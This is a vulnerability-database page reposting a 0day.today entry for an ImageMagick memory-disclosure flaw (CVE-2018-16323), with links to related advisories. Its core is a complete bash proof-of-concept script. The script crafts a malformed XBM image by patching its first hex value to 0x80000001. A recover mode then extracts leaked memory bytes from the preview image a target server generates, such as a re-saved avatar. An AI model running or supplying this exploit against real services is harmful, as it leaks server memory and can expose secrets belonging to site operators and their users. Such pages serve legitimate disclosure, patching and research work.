Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

ImageMagick - Memory Leak Exploit

🗓️ 20 Nov 2018 00:00:00Reported by barracud4_Type 
zdt
 zdt🔗 0day.today👁 67 Views

ImageMagick Memory Leak Exploit poc generator and result recover

Related
Code
ReporterTitlePublishedViews
Family
Cloud Foundry		USN-4034-1: ImageMagick vulnerabilities | Cloud Foundry
10 Jul 201900:00
cloudfoundry
Cloud Foundry		USN-3785-1: ImageMagick vulnerabilities | Cloud Foundry
9 Oct 201800:00
cloudfoundry
Circl		CVE-2018-16323
19 Nov 201816:07
circl
CNVD		ImageMagick 'ReadXBMImage' Function Information Disclosure Vulnerability
4 Sep 201800:00
cnvd
Check Point Advisories		ImageMagick ReadXBMImage Information Disclosure (CVE-2018-16323)
18 Sep 202200:00
checkpoint_advisories
CVE		CVE-2018-16323
1 Sep 201818:00
cve
Cvelist		CVE-2018-16323
1 Sep 201818:00
cvelist
Debian CVE		CVE-2018-16323
1 Sep 201818:00
debiancve
Tenable Nessus		EulerOS 2.0 SP5 : ImageMagick (EulerOS-SA-2019-2160)
12 Nov 201900:00
nessus
Tenable Nessus		EulerOS 2.0 SP2 : ImageMagick (EulerOS-SA-2019-2354)
10 Dec 201900:00
nessus
Rows per page
#!/bin/bash
 
help() {
  echo "Usage poc generator: `basename $0` gen WIDTHxHEIGHT NAME.xbm [minimal]"
  echo "  Example gen: `basename $0` gen 512x512 poc.xbm"
  echo "Usage result recovery: `basename $0` recover SAVED_PREVIEW.png|jpeg|gif|etc"
  echo "  Example recovery: `basename $0` recover avatar.png"
}
if [ "$1" == "-h" ]; then
  help;
  exit 0
fi
if [ "$1" == "gen" ]; then
  echo "Generating..."
  convert -size $2 xc:white $3
  sed -i '0,/0x../s//0x80000001/' $3
  if [ "$4" == "minimal" ]; then
    echo "Shrink to minimal body size mode"
    sed -i 's/0x00//g' $3
    sed -i 's/,//g' $3
    sed -i '/^\s*$/d' $3
  fi
  echo "Done"
  exit 0
fi
if [ "$1" == "recover" ]; then
  convert $2 temp.xbm
  cat temp.xbm | grep -o '0x..' | xxd -r -p | strings -3
  rm temp.xbm
  exit 0
fi
help;

#  0day.today [2018-12-12]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
20 Nov 2018 00:00Current
EPSS0.8691
imagemagickmemory leakexploitpoc generatorresult recoverybashconvert
67